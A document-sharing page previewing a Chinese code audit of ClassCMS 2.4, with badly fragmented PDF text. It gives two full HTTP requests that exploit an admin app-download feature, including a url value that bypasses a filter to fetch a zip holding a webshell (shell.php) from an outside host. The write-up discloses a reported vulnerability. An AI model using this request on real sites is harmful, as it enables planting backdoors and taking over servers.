没有合适的资源？快使用搜索试试~ 我知道了~

文库首页安全技术网络安全ClassCMS 2.4代码审计1

ClassCMS 2.4代码审计1

需积分: 0 0 下载量 160 浏览量 2022-08-03 20:05:05 上传评论收藏 1.52MB PDF 举报

温馨提示

试读

22页

ClassCMS 2.4 代码审计 - 先知社区此次漏洞分析皆在本地测试，且漏洞已经提交 cnvd 平台需要后台管理员权限在后台的管理 -> 应管理 -> 应

资源详情

资源评论

资源推荐

ClassCMS 2.4

代

码

审

计

先

知

社

区

此次

漏

洞

分

析

皆

在

本

地

测

试

，且

漏

洞

已

经

提

交

⾄

cnvd

平

台

需

要

后台

管

理

员

权

限

http:///ClassCMS/admin666?do=shop:downloadClass&ajax=1

在

后台

的

管

理

应

⽤

管

理

应

⽤

下

载

处

存

在

任

意

远

程

⽂

件

下

载

先

知

社

区

，

先

知

安

全

技

术

社

区

“

前

⾔

漏

洞

url

漏

洞

点

(https://xz

ﬁ

le.aliyuncs.com/media/upload/picture/20220107172807-1f7323f0-6f9c-1.png)

(https://xz

ﬁ

le.aliyuncs.com/media/upload/picture/20220107172821-27b780b0-6f9c-1.png)

先

放掉

第

⼀个

请

求

包

POST /admin666?do=shop:index&ajax=1&action=fileurl&from=install HTTP/1.1

Host: classcms

Content-Length: 43

Accept: application/json, text/javascript, */*; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Sa

fari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://classcms

Referer: http://classcms/admin666?do=shop:index&bread=%E8%87%AA%E5%AE%9A%E4%B9%89%E8%A1%A8%E5%8D%95&action=detail&cl

asshash=diyform

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: token_2ab421=9632c6413dde844887912fd77a75a07f; csrf_2ab421=1547308b

Connection: close

classhash=diyform&version=1.1&csrf=1547308b

然

后

修

改

第

⼆

个

请

求

包

POST /admin666?do=shop:downloadClass&ajax=1 HTTP/1.1

Host: classcms

Content-Length: 85

Accept: application/json, text/javascript, */*; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Sa

fari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.159.1

Referer: http://192.168.159.1/ClassCMS/admin666?do=shop:index&bread=%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91&action=deta

il&classhash=classcreate

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: token_2ab421=5d012ca838cc5f0aff02c44c8e2c91e7; csrf_2ab421=338ceb00

Connection: close

classhash={dir}&url=http://@{ip}:{port}@classcms.com/{shell.zip}&csrf=338ceb00

参

数

解

析

classhash

为

解

压

出

来

的

最

后

⽂

件

名

url

为了

绕

过过

滤

设

成

如

下

形式

http://@192.168.159.1:[email protected]/shell.zip

远

程

端

⼝

（

默

认

也

需

要

加

上），⼀个

包

含

⽊

⻢

⽂

件

（

shell.php

）

的

zip

压

缩

包

剩余21页未读，继续阅读

内容反馈

MurcielagoS

粉丝: 16
资源: 320

上传资源快速赚钱

我的内容管理展开

我的资源快来上传第一个资源

我的收益

登录查看自己的收益

我的积分登录查看自己的积分

我的C币登录后查看C币余额

我的收藏

我的下载

下载帮助

前往需求广场，查看用户热搜

ClassCMS 2.4代码审计1

评论0

最新资源

ClassCMS 2.4代码审计1

评论0

ClassCMS内容管理系统 v2.4

ClassCMS v1.2

ClassCMS内容管理系统 1.5

ClassCMS内容管理系统-PHP

ClassCMS网站流量统计系统 v1.3

基于PHP的ClassCMS PHP内容管理系统.zip

PHP实例开发源码—ClassCMS PHP内容管理系统.zip

archive_ ClassCMS内容管理系统 v4.3 [江西新余电信].zip.zip

archive_ ClassCMS内容管理系统 v4.4 [江西新余电信].zip.zip

classcms统计版本

PHPClassCMS网站流量统计系统.zip

Class CMS 内容管理系统 v1.0

PHPClassCMS网站流量统计系统 v1.3

VM-Pro通用化视觉系统框架V1.6

net framework4.0和4.5开发包（用于visual studio 2022 安装net旧版本）

串口侦听 串口监听 不占用串口 不占用串口的监听

【C#源码】TCP+串口通信的调试工具 （源码+教学视频）

用c# 自己封装的Modbus工具类库源码

C# 读取西门子S7系列PLC教程及源码 Profinet

C#含有ModbusRtu通讯库，通讯示例 硬件设备测试例程

基于C#与Sql Server的智慧星学生选课管理系统.rar

C#40000字全套精华教程！！！从入门到精通，一篇就够了！！！

HslCommunication.dll 7.0.1 免费版本 全部源代码和测试工程

C# .Net使用第三方库PacketDotNet，开发的抓包软件示例

封装owin的dll包

c#深度学习-PaddleOCRSharp数字识别demo

C# WinForm虚拟串口通信

MaterialDesignIn XamlToolkit 压缩包（已编译，可直接打开，0 积分免费下载）

全套C#教程(可当手册)

最新资源

串口侦听串口监听不占用串口不占用串口的监听

【C#源码】TCP+串口通信的调试工具（源码+教学视频）

C#含有ModbusRtu通讯库，通讯示例硬件设备测试例程

HslCommunication.dll 7.0.1 免费版本全部源代码和测试工程